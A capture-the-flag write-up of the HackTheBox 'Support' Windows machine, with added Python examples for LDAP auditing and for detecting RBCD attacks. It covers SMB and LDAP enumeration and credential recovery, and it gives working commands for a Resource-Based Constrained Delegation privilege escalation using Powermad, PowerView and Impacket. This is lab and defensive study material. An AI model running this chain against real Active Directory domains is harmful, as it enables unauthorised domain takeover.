New Learning:
- Powershell scripting
- Active Directory Enumeration
- Kerberos Resource-Based Constrained Delegation Attack
Scan the target machine for open ports.
## nmap -vv -p- -Pn 10.10.11.174
## nmap -vv -p- -Pn -sV 10.10.11.174
Enumerate Port 445/SMB
## SMB with anonymous access
## smbclient using anonymous access:
## Downloaded UserInfo.Exe.Zip, extracted content and reviewed code:
## Reviewed code and found interesting ldapquery function.
## Got the Protected module (it seems the module needs to be run to obtain the cleartext password):
## Since the code is C#, I used PowerShell ISE to load and run the function in PowerShell: I copied the Protected module code into PowerShell ISE, wrapped it in "Add-Type" with the CSharp language, and modified some namespace and string values.
Ref#1: https://blog.adamfurmanek.pl/2016/03/19/executing-c-code-using-powershell-script/
## Ran the script $code and got the ldap@support.htb password:
## Tested query using ldap@support.htb account:
Enumerate LDAP to get more user accounts:
## Check ldap access:
ldapsearch -x -H ldap://10.10.11.174 -D 'ldap@support.htb' -W -b "dc=support,dc=htb" -s base
## Use windapsearch to enum LDAP/AD users:
## LDAP query for enabled accounts:
ldapsearch -x -H ldap://10.10.11.174 -LLL -D 'ldap@support.htb' -W -b "dc=support,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
## LDAP query for password lockout policy:
ldapsearch -x -H ldap://10.10.11.174 -LLL -D 'ldap@support.htb' -W -b "dc=support,dc=htb" -s sub | grep lockoutThreshold
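The two queries above lean on details that are easy to misread from raw LDIF: the OID `1.2.840.113556.1.4.803` is the LDAP_MATCHING_RULE_BIT_AND rule, so the filter keeps entries whose ACCOUNTDISABLE bit (0x2) of userAccountControl is clear, and a `lockoutThreshold` of 0 means the domain never locks accounts. The following is an added example, not part of the original notes: a small LDIF parser that decodes the userAccountControl bit field and reports the lockout threshold over a constructed sample (the entries and values are made up for this example and are not the box's real output).

```python
"""Decode userAccountControl and lockoutThreshold from ldapsearch LDIF output.

Added example: the sample LDIF below is constructed, not real output from support.htb.
"""
import base64

# userAccountControl bits (from MS-ADTS). The filter
# (!(userAccountControl:1.2.840.113556.1.4.803:=2)) uses the BIT_AND matching
# rule, so it keeps entries whose ACCOUNTDISABLE (0x2) bit is clear.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

SAMPLE_LDIF = """\
# constructed sample; values chosen to exercise the decoder
dn: DC=support,DC=htb
objectClass: domainDNS
lockoutThreshold: 0
lockoutDuration: -18000000000

dn: CN=ldap,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
sAMAccountName: ldap
userAccountControl: 66048

dn: CN=Guest,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: user
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
sAMAccountName: Guest
userAccountControl: 66082

dn: CN=DC,OU=Domain Controllers,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: user
objectClass: computer
objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=support,DC=htb
sAMAccountName: DC$
userAccountControl: 532480
"""


def parse_ldif(text):
    """Turn LDIF text into a list of {attribute: [values]} dicts.

    Handles folded lines (leading space continues the previous line) and
    base64 values ("attr:: ...").  Comments ("#") are skipped.
    """
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:          # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        key, _, value = line.partition(":")
        value = value.strip()
        if value.startswith(":"):      # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(key.strip(), []).append(value)
    return entries


def decode_uac(value):
    """Return the flag names set in a userAccountControl value, lowest bit first."""
    uac = int(value)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if uac & bit]


def enabled_accounts(entries):
    """Mirror the ldapsearch filter: objectCategory=person, objectClass=user, not disabled.

    The DC$ computer object has objectClass user too, but objectCategory=Computer
    keeps it out, exactly as in the real query.
    """
    found = []
    for e in entries:
        if "user" not in e.get("objectClass", []):
            continue
        if not e.get("objectCategory", [""])[0].upper().startswith("CN=PERSON,"):
            continue
        if not int(e.get("userAccountControl", ["0"])[0]) & 0x2:
            found.append(e["sAMAccountName"][0])
    return found


def lockout_policy(entries):
    """Return the domain lockoutThreshold; 0 means accounts are never locked out."""
    for e in entries:
        if "lockoutThreshold" in e:
            return int(e["lockoutThreshold"][0])
    return None


if __name__ == "__main__":
    entries = parse_ldif(SAMPLE_LDIF)
    print("enabled:", enabled_accounts(entries))
    print("lockoutThreshold:", lockout_policy(entries))
    for e in entries:
        if "userAccountControl" in e:
            print(e["sAMAccountName"][0], decode_uac(e["userAccountControl"][0]))
```

Feeding real `ldapsearch -LLL` output into `parse_ldif` gives the same dictionaries, so the decoder doubles as a quick audit of which accounts carry TRUSTED_FOR_DELEGATION or DONT_REQ_PREAUTH and whether the lockout threshold is 0.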
## I ran the LDAP query without a filter and scanned each value returned:
ldapsearch -x -H ldap://10.10.11.174 -LLL -D 'ldap@support.htb' -W -b "dc=support,dc=htb" -s sub
# I found that DC.support.htb (the domain controller) has the msDS-AllowedToActOnBehalfOfOtherIdentity setting enabled. (Must check for a possible RBCD attack; Ref: https://github.com/tothi/rbcd-attack).
# I got the password of the "Support@support.htb" account from the Info attribute of its AD user object.
I ran samrdump.py and GetADUsers.py from Impacket with the ldap@support.htb account to enumerate more interesting accounts, but found only the same regular accounts as the previous query.
Findings:
- SMB shared files downloadable from support-tools using anonymous account.
- Password for LDAP@support.htb extracted from UserInfo.exe code.
- Password for user support@support.htb found in AD Users object Info Attributes.
- Possible Kerberos Resource-Based Constrained Delegation Attack.
Access and attack process:
## Access DC.support.htb using Evil-Winrm:
## Ran enumeration inside target machine:
# Ran winPEAS but found no vulnerability for PrivEsc.
# Checked support@support.htb privileges and permissions.
# Collected AD info with the BloodHound ingestor and ran BloodHound from my Kali machine.
Performed privilege escalation using the RBCD attack [Ref: https://github.com/tothi/rbcd-attack]:
## Login to dc.support.htb machine using evil-winrm:
## Uploaded powermad, powerview, rubeus, admodule.
## Created a fake computer account using Powermad:
. ./powermad.ps1
$pass = ConvertTo-SecureString "password-123." -AsPlainText -Force
New-MachineAccount -MachineAccount uno02 -Password $($pass)
## Verified new machine created.
## Set PrincipalsAllowedToDelegateToAccount of DC.support.htb
. ./powerview.ps1
Set-ADComputer dc -PrincipalsAllowedToDelegateToAccount uno02$
## Verified new settings of DC (domain controller machine) for PrincipalsAllowedToDelegateToAccount
## Set up the RBCD attack using Impacket's rbcd.py from my Kali machine.
## Request service ticket for administrator using Impacket getST.py.
## Exported the administrator service ticket to my Kali Kerberos cache:
## Accessed the DC (target machine) using psexec.py with Kerberos authentication.
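From the defender's side, the chain above leaves two distinct traces in the Security log of the domain controller: the Powermad step raises event 4741 (a computer account was created, by an ordinary user thanks to the default MachineAccountQuota of 10), and the Set-ADComputer step raises event 5136 (directory service object modified) naming msDS-AllowedToActOnBehalfOfOtherIdentity, provided Directory Service Changes auditing is enabled on the object. The following is an added example, not part of the original notes: correlation logic run over constructed event records (simplified from the real XML; the account names, DNs and timestamps are made up, and the provisioning-account allowlist is an assumption for the example).

```python
"""Correlate computer-account creation (4741) with a write to
msDS-AllowedToActOnBehalfOfOtherIdentity (5136) into an RBCD alert.

Added example with constructed events; field names are simplified from the
Security log XML and the allowlists below are assumptions for the example.
"""
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
# Accounts expected to join computers to the domain (assumption for the example).
PROVISIONING_ACCOUNTS = {"svc_sccm"}
# Tier-0 objects: any delegation change here is an incident (constructed DN).
TIER0_DNS = {"CN=DC,OU=Domain Controllers,DC=support,DC=htb"}

# Constructed sample events, not real logs from the box.
SAMPLE_EVENTS = [
    {"time": "2022-08-01T10:00:00", "id": 4741, "subject": "support", "target": "uno02$"},
    {"time": "2022-08-01T10:03:00", "id": 5136, "subject": "support",
     "object_dn": "CN=DC,OU=Domain Controllers,DC=support,DC=htb",
     "attribute": RBCD_ATTR, "operation": "Value Added"},
    {"time": "2022-08-01T12:00:00", "id": 4741, "subject": "svc_sccm", "target": "ws-finance-12$"},
    {"time": "2022-08-02T09:00:00", "id": 5136, "subject": "support",
     "object_dn": "CN=ws-finance-12,CN=Computers,DC=support,DC=htb",
     "attribute": "description", "operation": "Value Added"},
]


def parse_time(value):
    return datetime.fromisoformat(value)


def suspicious_machine_creations(events):
    """4741 raised by a user account that is not a known provisioning account."""
    return [e for e in events
            if e["id"] == 4741
            and e["subject"] not in PROVISIONING_ACCOUNTS
            and not e["subject"].endswith("$")]


def rbcd_changes(events):
    """5136 events that touch the RBCD attribute, whatever the target object."""
    return [e for e in events if e["id"] == 5136 and e["attribute"] == RBCD_ATTR]


def correlate(events, window=timedelta(hours=1)):
    """Return (severity, subject, detail) alerts.

    An RBCD write on a tier-0 object is critical on its own; if the same
    subject created a computer account within `window` before the write, the
    alert names that account, because it is the principal that will be allowed
    to impersonate users to the target.
    """
    alerts = []
    creations = suspicious_machine_creations(events)
    for change in rbcd_changes(events):
        t = parse_time(change["time"])
        chain = [c for c in creations
                 if c["subject"] == change["subject"]
                 and timedelta(0) <= t - parse_time(c["time"]) <= window]
        severity = "critical" if change["object_dn"] in TIER0_DNS else "high"
        detail = f"{RBCD_ATTR} written on {change['object_dn']}"
        if chain:
            detail += f" after creating {chain[0]['target']}"
        alerts.append((severity, change["subject"], detail))
    for c in creations:
        alerts.append(("medium", c["subject"],
                       f"computer account {c['target']} created by non-provisioning user"))
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(*alert, sep=" | ")
```

The same two checks map directly onto the hardening side: set ms-DS-MachineAccountQuota to 0 so ordinary users cannot create the fake computer in the first place, and review who holds write access to msDS-AllowedToActOnBehalfOfOtherIdentity on domain controllers, since that write is the whole attack.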